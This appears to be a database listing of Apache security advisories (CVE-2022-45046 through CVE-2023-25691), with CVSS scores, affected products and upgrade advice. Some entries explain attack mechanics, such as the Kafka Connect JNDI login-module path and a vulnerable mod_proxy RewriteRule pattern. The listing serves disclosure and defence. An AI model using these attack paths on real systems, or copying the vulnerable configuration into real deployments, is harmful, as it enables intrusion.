debian debian_linux 10.0
apache xml_graphics_batik *
CVE-2022-45046

DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: none. Reason: This candidate was withdrawn by its CNA. Further investigation showed that it was not a security issue. Notes: none.

Products Affected

Vendor Product Version
apache camel 3.19.0
apache camel *
CVE-2022-45047

Class org.apache.sshd.server.keyprovider.SimpleGeneratorHostKeyProvider in Apache MINA SSHD <= 2.9.1 uses Java deserialization to load a serialized java.security.PrivateKey. The class is one of several implementations that an implementor using Apache MINA SSHD can choose for loading the host keys of an SSH server.

Products Affected

Vendor Product Version
apache sshd *
CVE-2022-45048

Authenticated users with appropriate privileges can create policies having expressions that can exploit code execution vulnerability. This issue affects Apache Ranger: 2.3.0. Users are recommended to update to version 2.4.0.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
security@apache.org 8.4 HIGH CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:H 1.7 6.0

Products Affected

Vendor Product Version
apache ranger 2.3.0
CVE-2022-45064

The SlingRequestDispatcher doesn't correctly implement the RequestDispatcher API resulting in a generic type of include-based cross-site scripting issues on the Apache Sling level. The vulnerability is exploitable by an attacker that is able to include a resource with specific content-type and control the include path (i.e. writing content). The impact of a successful attack is privilege escalation to administrative power. Please update to Apache Sling Engine >= 2.14.0 and enable the "Check Content-Type overrides" configuration option.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
security@apache.org 8.0 HIGH CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:H 1.3 6.0

Products Affected

Vendor Product Version
apache sling *
apache apache_sling_engine *
CVE-2022-45135

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Apache Cocoon.This issue affects Apache Cocoon: from 2.2.0 before 2.3.0. Users are recommended to upgrade to version 2.3.0, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

Products Affected

Vendor Product Version
apache cocoon *
CVE-2022-45136

Apache Jena SDB 3.17.0 and earlier is vulnerable to a JDBC Deserialisation attack if the attacker is able to control the JDBC URL used or cause the underlying database server to return malicious data. The mySQL JDBC driver in particular is known to be vulnerable to this class of attack. As a result an application using Apache Jena SDB can be subject to RCE when connected to a malicious database server. Apache Jena SDB has been EOL since December 2020 and users should migrate to alternative options e.g. Apache Jena TDB 2.

Products Affected

Vendor Product Version
apache jena_sdb *
CVE-2022-45143

The JsonErrorReportValve in Apache Tomcat 8.5.83, 9.0.40 to 9.0.68 and 10.1.0-M1 to 10.1.1 did not escape the type, message or description values. In some circumstances these are constructed from user provided data and it was therefore possible for users to supply values that invalidated or manipulated the JSON output.

Products Affected

Vendor Product Version
apache tomcat *
apache tomcat 10.1.0
apache tomcat 8.5.83
apache tomcat 10.1.1
CVE-2022-45347

Apache ShardingSphere-Proxy prior to 5.3.0 when using MySQL as database backend didn't cleanup the database session completely after client authentication failed, which allowed an attacker to execute normal commands by constructing a special MySQL client. This vulnerability has been fixed in Apache ShardingSphere 5.3.0.

Products Affected

Vendor Product Version
apache shardingsphere *
CVE-2022-45378

In the default configuration of Apache SOAP, an RPCRouterServlet is available without authentication. This gives an attacker the possibility to invoke methods on the classpath that meet certain criteria. Depending on what classes are available on the classpath this might even lead to arbitrary remote code execution. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

Products Affected

Vendor Product Version
apache soap *
CVE-2022-45402

In Apache Airflow versions prior to 2.4.3, there was an open redirect in the webserver's `/login` endpoint.

Products Affected

Vendor Product Version
apache airflow *
CVE-2022-45438

When explicitly enabling the feature flag DASHBOARD_CACHE (disabled by default), the system allowed for an unauthenticated user to access dashboard configuration metadata using a REST API Get endpoint. This issue affects Apache Superset version 1.5.2 and prior versions and version 2.0.0.

Products Affected

Vendor Product Version
apache superset 2.0.0
apache superset *
CVE-2022-45462

Alarm instance management has command injection when there is a specific command configured. It is only for logged-in users. We recommend you upgrade to version 2.0.6 or higher

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

Products Affected

Vendor Product Version
apache dolphinscheduler *
CVE-2022-45470

missing input validation in Apache Hama may cause information disclosure through path traversal and XSS. Since Apache Hama is EOL, we do not expect these issues to be fixed.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

Products Affected

Vendor Product Version
apache hama *
CVE-2022-45786

There are issues with the AGE drivers for Golang and Python that enable SQL injections to occur. This impacts AGE for PostgreSQL 11 & AGE for PostgreSQL 12, all versions up-to-and-including 1.1.0, when using those drivers. The fix is to update to the latest Golang and Python drivers in addition to the latest version of AGE that is used for PostgreSQL 11 or  PostgreSQL 12. The update of AGE will add a new function to enable parameterization of the cypher() function, which, in conjunction with the driver updates, will resolve this issue. Background (for those who want more information): After thoroughly researching this issue, we found that due to the nature of the cypher() function, it was not easy to parameterize the values passed into it. This enabled SQL injections, if the developer of the driver wasn't careful. The developer of the Golang and Pyton drivers didn't fully utilize parameterization, likely because of this, thus enabling SQL injections. The obvious fix to this issue is to use parameterization in the drivers for all PG SQL queries. However, parameterizing all PG queries is complicated by the fact that the cypher() function call itself cannot be parameterized directly, as it isn't a real function. At least, not the parameters that would take the graph name and cypher query. The reason the cypher() function cannot have those values parameterized is because the function is a placeholder and never actually runs. The cypher() function node, created by PG in the query tree, is transformed and replaced with a query tree for the actual cypher query during the analyze phase. The problem is that parameters - that would be passed in and that the cypher() function transform needs to be resolved - are only resolved in the execution phase, which is much later. Since the transform of the cypher() function needs to know the graph name and cypher query prior to execution, they can't be passed as parameters. The fix that we are testing right now, and are proposing to use, is to create a function that will be called prior to the execution of the cypher() function transform. This new function will allow values to be passed as parameters for the graph name and cypher query. As this command will be executed prior to the cypher() function transform, its values will be resolved. These values can then be cached for the immediately following cypher() function transform to use. As added features, the cached values will store the calling session's pid, for validation. And, the cypher() function transform will clear this cached information after function invocation, regardless of whether it was used. This method will allow the parameterizing of the cypher() function indirectly and provide a way to lock out SQL injection attacks.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 8.1 HIGH CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H 2.2 5.9

Products Affected

Vendor Product Version
apache age *
CVE-2022-45787

Unproper laxist permissions on the temporary files used by MIME4J TempFileStorageProvider may lead to information disclosure to other local users. This issue affects Apache James MIME4J version 0.8.8 and prior versions. We recommend users to upgrade to MIME4j version 0.8.9 or later.

Products Affected

Vendor Product Version
apache james *
CVE-2022-45801

Apache StreamPark 1.0.0 to 2.0.0 have a LDAP injection vulnerability. LDAP Injection is an attack used to exploit web based applications that construct LDAP statements based on user input. When an application fails to properly sanitize user input, it's possible to modify LDAP statements through techniques similar to SQL Injection. LDAP injection attacks could result in the granting of permissions to unauthorized queries, and content modification inside the LDAP tree. This risk may only occur when the user logs in with ldap, and the user name and password login will not be affected, Users of the affected versions should upgrade to Apache StreamPark 2.0.0 or later.

Products Affected

Vendor Product Version
apache streampark *
CVE-2022-45802

Streampark allows any users to upload a jar as application, but there is no mandatory verification of the uploaded file type, causing users to upload some high-risk files, and may upload them to any directory, Users of the affected versions should upgrade to Apache StreamPark 2.0.0 or later

Products Affected

Vendor Product Version
apache streampark *
CVE-2022-45855

SpringEL injection in the metrics source in Apache Ambari version 2.7.0 to 2.7.6 allows a malicious authenticated user to execute arbitrary code remotely. Users are recommended to upgrade to 2.7.7.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
security@apache.org 8.0 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H 2.1 5.9

Products Affected

Vendor Product Version
apache ambari *
CVE-2022-45875

Improper validation of script alert plugin parameters in Apache DolphinScheduler to avoid remote command execution vulnerability. This issue affects Apache DolphinScheduler version 3.0.1 and prior versions; version 3.1.0 and prior versions. This attack can be performed only by authenticated users which can login to DS.

Products Affected

Vendor Product Version
apache dolphinscheduler *
apache dolphinscheduler 3.1.0
CVE-2022-45910

Improper neutralization of special elements used in an LDAP query ('LDAP Injection') vulnerability in ActiveDirectory and Sharepoint ActiveDirectory authority connectors of Apache ManifoldCF allows an attacker to manipulate the LDAP search queries (DoS, additional queries, filter manipulation) during user lookup, if the username or the domain string are passed to the UserACLs servlet without validation. This issue affects Apache ManifoldCF version 2.23 and prior versions.

Products Affected

Vendor Product Version
apache manifoldcf *
CVE-2022-45935

Usage of temporary files with insecure permissions by the Apache James server allows an attacker with local access to access private user data in transit. Vulnerable components includes the SMTP stack and IMAP APPEND command. This issue affects Apache James server version 3.7.2 and prior versions.

Products Affected

Vendor Product Version
apache james *
CVE-2022-46337

A cleverly devised username might bypass LDAP authentication checks. In LDAP-authenticated Derby installations, this could let an attacker fill up the disk by creating junk Derby databases. In LDAP-authenticated Derby installations, this could also allow the attacker to execute malware which was visible to and executable by the account which booted the Derby server. In LDAP-protected databases which weren't also protected by SQL GRANT/REVOKE authorization, this vulnerability could also let an attacker view and corrupt sensitive data and run sensitive database functions and procedures. Mitigation: Users should upgrade to Java 21 and Derby 10.17.1.0. Alternatively, users who wish to remain on older Java versions should build their own Derby distribution from one of the release families to which the fix was backported: 10.16, 10.15, and 10.14. Those are the releases which correspond, respectively, with Java LTS versions 17, 11, and 8.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

Products Affected

Vendor Product Version
apache derby *
apache derby 10.16.1.1
CVE-2022-46363

A vulnerability in Apache CXF before versions 3.5.5 and 3.4.10 allows an attacker to perform a remote directory listing or code exfiltration. The vulnerability only applies when the CXFServlet is configured with both the static-resources-list and redirect-query-check attributes. These attributes are not supposed to be used together, and so the vulnerability can only arise if the CXF service is misconfigured.

Products Affected

Vendor Product Version
apache cxf *
CVE-2022-46364

A SSRF vulnerability in parsing the href attribute of XOP:Include in MTOM requests in versions of Apache CXF before 3.5.5 and 3.4.10 allows an attacker to perform SSRF style attacks on webservices that take at least one parameter of any type. 

Products Affected

Vendor Product Version
apache cxf *
CVE-2022-46365

Apache StreamPark 1.0.0 before 2.0.0 When the user successfully logs in, to modify his profile, the username will be passed to the server-layer as a parameter, but not verified whether the user name is the currently logged user and whether the user is legal, This will allow malicious attackers to send any username to modify and reset the account, Users of the affected versions should upgrade to Apache StreamPark 2.0.0 or later.

Products Affected

Vendor Product Version
apache streampark *
CVE-2022-46366

Apache Tapestry 3.x allows deserialization of untrusted data, leading to remote code execution. This issue is similar to but distinct from CVE-2020-17531, which applies the the (also unsupported) 4.x version line. NOTE: This vulnerability only affects Apache Tapestry version line 3.x, which is no longer supported by the maintainer. Users are recommended to upgrade to a supported version line of Apache Tapestry.

Products Affected

Vendor Product Version
apache tapestry *
CVE-2022-46421

Improper Neutralization of Special Elements used in a Command ('Command Injection') vulnerability in Apache Software Foundation Apache Airflow Hive Provider.This issue affects Apache Airflow Hive Provider: before 5.0.0.

Products Affected

Vendor Product Version
apache apache-airflow-providers-apache-hive *
CVE-2022-46651

Apache Airflow, versions before 2.6.3, is affected by a vulnerability that allows an unauthorized actor to gain access to sensitive information in Connection edit view. This vulnerability is considered low since it requires someone with access to Connection resources specifically updating the connection to exploit it. Users should upgrade to version 2.6.3 or later which has removed the vulnerability.

Products Affected

Vendor Product Version
apache airflow *
CVE-2022-46751

Improper Restriction of XML External Entity Reference, XML Injection (aka Blind XPath Injection) vulnerability in Apache Software Foundation Apache Ivy.This issue affects any version of Apache Ivy prior to 2.5.2. When Apache Ivy prior to 2.5.2 parses XML files - either its own configuration, Ivy files or Apache Maven POMs - it will allow downloading external document type definitions and expand any entity references contained therein when used. This can be used to exfiltrate data, access resources only the machine running Ivy has access to or disturb the execution of Ivy in different ways. Starting with Ivy 2.5.2 DTD processing is disabled by default except when parsing Maven POMs where the default is to allow DTD processing but only to include a DTD snippet shipping with Ivy that is needed to deal with existing Maven POMs that are not valid XML files but are nevertheless accepted by Maven. Access can be be made more lenient via newly introduced system properties where needed. Users of Ivy prior to version 2.5.2 can use Java system properties to restrict processing of external DTDs, see the section about "JAXP Properties for External Access restrictions" inside Oracle's "Java API for XML Processing (JAXP) Security Guide".

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 8.2 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:L 3.9 4.2
134c704f-9b21-4f2e-91b3-4a467353bcc0 8.2 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:L 3.9 4.2

Products Affected

Vendor Product Version
apache ivy *
CVE-2022-46769

An improper neutralization of input during web page generation ('Cross-site Scripting') [CWE-79] vulnerability in Sling App CMS version 1.1.2 and prior may allow an authenticated remote attacker to perform a reflected cross-site scripting (XSS) attack in the site group feature. Upgrade to Apache Sling App CMS >= 1.1.4

Products Affected

Vendor Product Version
apache sling_cms *
CVE-2022-46870

An Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Apache Zeppelin allows logged-in users to execute arbitrary javascript in other users' browsers. This issue affects Apache Zeppelin before 0.8.2. Users are recommended to upgrade to a supported version of Zeppelin.

Products Affected

Vendor Product Version
apache zeppelin *
CVE-2022-46907

A carefully crafted request on several JSPWiki plugins could trigger an XSS vulnerability on Apache JSPWiki, which could allow the attacker to execute javascript in the victim's browser and get some sensitive information about the victim. Apache JSPWiki users should upgrade to 2.12.0 or later.

Products Affected

Vendor Product Version
apache jspwiki *
CVE-2022-47184

Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Apache Software Foundation Apache Traffic Server.This issue affects Apache Traffic Server: 8.0.0 to 9.2.0.

Products Affected

Vendor Product Version
apache traffic_server *
debian debian_linux 12.0
debian debian_linux 11.0
CVE-2022-47185

Improper input validation vulnerability on the range header in Apache Software Foundation Apache Traffic Server.This issue affects Apache Traffic Server: through 9.2.1.

Products Affected

Vendor Product Version
apache traffic_server *
CVE-2022-47500

URL Redirection to Untrusted Site ('Open Redirect') vulnerability in Apache Software Foundation Apache Helix UI component.This issue affects Apache Helix all releases from 0.8.0 to 1.0.4. Solution: removed the the forward component since it was improper designed for UI embedding.  User please upgrade to 1.1.0 to fix this issue.

Products Affected

Vendor Product Version
apache helix *
CVE-2022-47501

Arbitrary file reading vulnerability in Apache Software Foundation Apache OFBiz when using the Solr plugin. This is a  pre-authentication attack. This issue affects Apache OFBiz: before 18.12.07.

Products Affected

Vendor Product Version
apache ofbiz *
CVE-2022-47502

Apache OpenOffice documents can contain links that call internal macros with arbitrary arguments. Several URI Schemes are defined for this purpose. Links can be activated by clicks, or by automatic document events. The execution of such links must be subject to user approval. In the affected versions of OpenOffice, approval for certain links is not requested; when activated, such links could therefore result in arbitrary script execution.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.8 HIGH CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H 1.8 5.9

Products Affected

Vendor Product Version
apache openoffice *
CVE-2022-47894

Improper Input Validation vulnerability in Apache Zeppelin SAP.This issue affects Apache Zeppelin SAP: from 0.8.0 before 0.11.0. As this project is retired, we do not plan to release a version that fixes this issue. Users are recommended to find an alternative or restrict access to the instance to trusted users. For more information, the fix already was merged in the source code but Zeppelin decided to retire the SAP component NOTE: This vulnerability only affects products that are no longer supported by the maintainer.

Products Affected

Vendor Product Version
apache zeppelin *
CVE-2022-47937

Improper input validation in the Apache Sling Commons JSON bundle allows an attacker to trigger unexpected errors by supplying specially-crafted input. The org.apache.sling.commons.json bundle has been deprecated as of March 2017 and should not be used anymore. Consumers are encouraged to consider the Apache Sling Commons Johnzon OSGi bundle provided by the Apache Sling project, but may of course use other JSON libraries.

Products Affected

Vendor Product Version
apache sling_commons_json *
CVE-2023-22602

When using Apache Shiro before 1.11.0 together with Spring Boot 2.6+, a specially crafted HTTP request may cause an authentication bypass. The authentication bypass occurs when Shiro and Spring Boot are using different pattern-matching techniques. Both Shiro and Spring Boot < 2.6 default to Ant style pattern matching. Mitigation: Update to Apache Shiro 1.11.0, or set the following Spring Boot configuration value: `spring.mvc.pathmatch.matching-strategy = ant_path_matcher`

Products Affected

Vendor Product Version
vmware spring_boot 2.6.0
apache shiro *
CVE-2023-22665

There is insufficient checking of user queries in Apache Jena versions 4.7.0 and earlier, when invoking custom scripts. It allows a remote user to execute arbitrary javascript via a SPARQL query.

Products Affected

Vendor Product Version
apache jena *
CVE-2023-22832

The ExtractCCDAAttributes Processor in Apache NiFi 1.2.0 through 1.19.1 does not restrict XML External Entity references. Flow configurations that include the ExtractCCDAAttributes Processor are vulnerable to malicious XML documents that contain Document Type Declarations with XML External Entity references. The resolution disables Document Type Declarations and disallows XML External Entity resolution in the ExtractCCDAAttributes Processor.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

Products Affected

Vendor Product Version
apache nifi *
CVE-2023-22849

An improper neutralization of input during web page generation ('Cross-site Scripting') [CWE-79] vulnerability in Sling App CMS version 1.1.4 and prior may allow an authenticated remote attacker to perform a reflected cross-site scripting (XSS) attack in multiple features. Upgrade to Apache Sling App CMS >= 1.1.6

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.1 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N 2.8 2.7

Products Affected

Vendor Product Version
apache sling_cms *
CVE-2023-22884

Improper Neutralization of Special Elements used in a Command ('Command Injection') vulnerability in Apache Software Foundation Apache Airflow, Apache Software Foundation Apache Airflow MySQL Provider.This issue affects Apache Airflow: before 2.5.1; Apache Airflow MySQL Provider: before 4.0.0.

Products Affected

Vendor Product Version
apache airflow *
apache apache-airflow-providers-mysql *
apache airflow_mysql_provider *
CVE-2023-22886

Improper Input Validation vulnerability in Apache Software Foundation Apache Airflow JDBC Provider. Airflow JDBC Provider Connection’s [Connection URL] parameters had no restrictions, which made it possible to implement RCE attacks via different type JDBC drivers, obtain airflow server permission. This issue affects Apache Airflow JDBC Provider: before 4.0.0.

Products Affected

Vendor Product Version
apache apache-airflow-providers-jdbc *
CVE-2023-22887

Apache Airflow, versions before 2.6.3, is affected by a vulnerability that allows an attacker to perform unauthorized file access outside the intended directory structure by manipulating the run_id parameter. This vulnerability is considered low since it requires an authenticated user to exploit it. It is recommended to upgrade to a version that is not affected

Products Affected

Vendor Product Version
apache airflow *
CVE-2023-22888

Apache Airflow, versions before 2.6.3, is affected by a vulnerability that allows an attacker to cause a service disruption by manipulating the run_id parameter. This vulnerability is considered low since it requires an authenticated user to exploit it. It is recommended to upgrade to a version that is not affected

Products Affected

Vendor Product Version
apache airflow *
CVE-2023-22946

In Apache Spark versions prior to 3.4.0, applications using spark-submit can specify a 'proxy-user' to run as, limiting privileges. The application can execute code with the privileges of the submitting user, however, by providing malicious configuration-related classes on the classpath. This affects architectures relying on proxy-user, for example those using Apache Livy to manage submitted applications. Update to Apache Spark 3.4.0 or later, and ensure that spark.submit.proxyUser.allowCustomClasspathInClusterMode is set to its default of "false", and is not overridden by submitted applications.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
security@apache.org 6.4 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N 3.1 2.7

Products Affected

Vendor Product Version
apache spark *
CVE-2023-23638

A deserialization vulnerability existed when dubbo generic invoke, which could lead to malicious code execution. This issue affects Apache Dubbo 2.7.x version 2.7.21 and prior versions; Apache Dubbo 3.0.x version 3.0.13 and prior versions; Apache Dubbo 3.1.x version 3.1.5 and prior versions.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
security@apache.org 5.0 MEDIUM CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L 1.6 3.4
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

Products Affected

Vendor Product Version
apache dubbo *
CVE-2023-24829

Incorrect Authorization vulnerability in Apache Software Foundation Apache IoTDB.This issue affects the iotdb-web-workbench component from 0.13.0 before 0.13.3. iotdb-web-workbench is an optional component of IoTDB, providing a web console of the database. This problem is fixed from version 0.13.3 of iotdb-web-workbench onwards.

Products Affected

Vendor Product Version
apache iotdb *
CVE-2023-24830

Improper Authentication vulnerability in Apache Software Foundation Apache IoTDB.This issue affects iotdb-web-workbench component: from 0.13.0 before 0.13.3.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N 3.9 3.6

Products Affected

Vendor Product Version
apache iotdb *
CVE-2023-24831

Improper Authentication vulnerability in Apache Software Foundation Apache IoTDB.This issue affects Apache IoTDB Grafana Connector: from 0.13.0 through 0.13.3. Attackers could login without authorization. This is fixed in 0.13.4.

Products Affected

Vendor Product Version
apache iotdb *
CVE-2023-24977

Out-of-bounds Read vulnerability in Apache Software Foundation Apache InLong.This issue affects Apache InLong: from 1.1.0 through 1.5.0. Users are advised to upgrade to Apache InLong's latest version or cherry-pick https://github.com/apache/inlong/pull/7214 https://github.com/apache/inlong/pull/7214  to solve it.

Products Affected

Vendor Product Version
apache inlong *
CVE-2023-24997

Deserialization of Untrusted Data vulnerability in Apache Software Foundation Apache InLong.This issue affects Apache InLong: from 1.1.0 through 1.5.0. Users are advised to upgrade to Apache InLong's latest version or cherry-pick https://github.com/apache/inlong/pull/7223 https://github.com/apache/inlong/pull/7223  to solve it.

Products Affected

Vendor Product Version
apache inlong *
CVE-2023-24998

Apache Commons FileUpload before 1.5 does not limit the number of request parts to be processed resulting in the possibility of an attacker triggering a DoS with a malicious upload or series of uploads. Note that, like all of the file upload limits, the new configuration option (FileUploadBase#setFileCountMax) is not enabled by default and must be explicitly configured.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

Products Affected

Vendor Product Version
debian debian_linux 9.0
apache commons_fileupload *
apache commons_fileupload 1.0
debian debian_linux 11.0
CVE-2023-25141

Apache Sling JCR Base < 3.1.12 has a critical injection vulnerability when running on old JDK versions (JDK 1.8.191 or earlier) through utility functions in RepositoryAccessor. The functions getRepository and getRepositoryFromURL allow an application to access data stored in a remote location via JDNI and RMI. Users of Apache Sling JCR Base are recommended to upgrade to Apache Sling JCR Base 3.1.12 or later, or to run on a more recent JDK.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

Products Affected

Vendor Product Version
apache sling_jcr_base *
CVE-2023-25194

A possible security vulnerability has been identified in Apache Kafka Connect API. This requires access to a Kafka Connect worker, and the ability to create/modify connectors on it with an arbitrary Kafka client SASL JAAS config and a SASL-based security protocol, which has been possible on Kafka Connect clusters since Apache Kafka Connect 2.3.0. When configuring the connector via the Kafka Connect REST API, an authenticated operator can set the `sasl.jaas.config` property for any of the connector's Kafka clients to "com.sun.security.auth.module.JndiLoginModule", which can be done via the `producer.override.sasl.jaas.config`, `consumer.override.sasl.jaas.config`, or `admin.override.sasl.jaas.config` properties. This will allow the server to connect to the attacker's LDAP server and deserialize the LDAP response, which the attacker can use to execute java deserialization gadget chains on the Kafka connect server. Attacker can cause unrestricted deserialization of untrusted data (or) RCE vulnerability when there are gadgets in the classpath. Since Apache Kafka 3.0.0, users are allowed to specify these properties in connector configurations for Kafka Connect clusters running with out-of-the-box configurations. Before Apache Kafka 3.0.0, users may not specify these properties unless the Kafka Connect cluster has been reconfigured with a connector client override policy that permits them. Since Apache Kafka 3.4.0, we have added a system property ("-Dorg.apache.kafka.disallowed.login.modules") to disable the problematic login modules usage in SASL JAAS configuration. Also by default "com.sun.security.auth.module.JndiLoginModule" is disabled in Apache Kafka Connect 3.4.0. We advise the Kafka Connect users to validate connector configurations and only allow trusted JNDI configurations. Also examine connector dependencies for vulnerable versions and either upgrade their connectors, upgrading that specific dependency, or removing the connectors as options for remediation. Finally, in addition to leveraging the "org.apache.kafka.disallowed.login.modules" system property, Kafka Connect users can also implement their own connector client config override policy, which can be used to control which Kafka client properties can be overridden directly in a connector config and which cannot.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 2.8 5.9

Products Affected

Vendor Product Version
apache kafka_connect *
apache kafka *
CVE-2023-25195

Server-Side Request Forgery (SSRF) vulnerability in Apache Software Foundation Apache Fineract. Authorized users with limited permissions can gain access to server and may be able to use server for any outbound traffic.  This issue affects Apache Fineract: from 1.4 through 1.8.3.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 8.1 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N 2.8 5.2

Products Affected

Vendor Product Version
apache fineract *
CVE-2023-25196

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Apache Software Foundation Apache Fineract. Authorized users may be able to change or add data in certain components.   This issue affects Apache Fineract: from 1.4 through 1.8.2.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 4.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N 2.8 1.4

Products Affected

Vendor Product Version
apache fineract *
CVE-2023-25197

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Apache Software Foundation apache fineract. Authorized users may be able to exploit this for limited impact on components.   This issue affects apache fineract: from 1.4 through 1.8.2.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L 2.8 3.4

Products Affected

Vendor Product Version
apache fineract *
CVE-2023-25504

A malicious actor who has been authenticated and granted specific permissions in Apache Superset may use the import dataset feature in order to conduct Server-Side Request Forgery attacks and query internal resources on behalf of the server where Superset is deployed. This vulnerability exists in Apache Superset versions up to and including 2.0.1.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
security@apache.org 4.9 MEDIUM CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N 1.2 3.6

Products Affected

Vendor Product Version
apache superset *
CVE-2023-25601

On version 3.0.0 through 3.1.1, Apache DolphinScheduler's python gateway suffered from improper authentication: an attacker could use a socket bytes attack without authentication. This issue has been fixed from version 3.1.2 onwards. For users who use version 3.0.0 to 3.1.1, you can turn off the python-gateway function by changing the value `python-gateway.enabled=false` in configuration file `application.yaml`. If you are using the python gateway, please upgrade to version 3.1.2 or above.

Products Affected

Vendor Product Version
apache dolphinscheduler *
CVE-2023-25613

An LDAP Injection vulnerability exists in the LdapIdentityBackend of Apache Kerby before 2.0.3. 

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

Products Affected

Vendor Product Version
apache kerby *
apache identity_backend *
apache kerby_ldap_backend *
CVE-2023-25621

Privilege Escalation vulnerability in Apache Software Foundation Apache Sling. Any content author is able to create i18n dictionaries in the repository in a location the author has write access to. As these translations are used across the whole product, it allows an author to change any text or dialog in the product. For example an attacker might fool someone by changing the text on a delete button to "Info". This issue affects the i18n module of Apache Sling up to version 2.5.18. Version 2.6.2 and higher limit by default i18m dictionaries to certain paths in the repository (/libs and /apps). Users of the module are advised to update to version 2.6.2 or higher, check the configuration for resource loading and then adjust the access permissions for the configured path accordingly.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N 2.8 3.6

Products Affected

Vendor Product Version
apache sling_i18n *
CVE-2023-25690

Some mod_proxy configurations on Apache HTTP Server versions 2.4.0 through 2.4.55 allow a HTTP Request Smuggling attack. Configurations are affected when mod_proxy is enabled along with some form of RewriteRule or ProxyPassMatch in which a non-specific pattern matches some portion of the user-supplied request-target (URL) data and is then re-inserted into the proxied request-target using variable substitution. For example, something like: RewriteEngine on RewriteRule "^/here/(.*)" "http://example.com:8080/elsewhere?$1"; [P] ProxyPassReverse /here/ http://example.com:8080/ Request splitting/smuggling could result in bypass of access controls in the proxy server, proxying unintended URLs to existing origin servers, and cache poisoning. Users are recommended to update to at least version 2.4.56 of Apache HTTP Server.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

Products Affected

Vendor Product Version
apache http_server *
CVE-2023-25691

Improper Input Validation vulnerability in the Apache Airflow Google Provider. This issue affects Apache Airflow Google Provider versions before 8.10.0.

CVSS 3.x

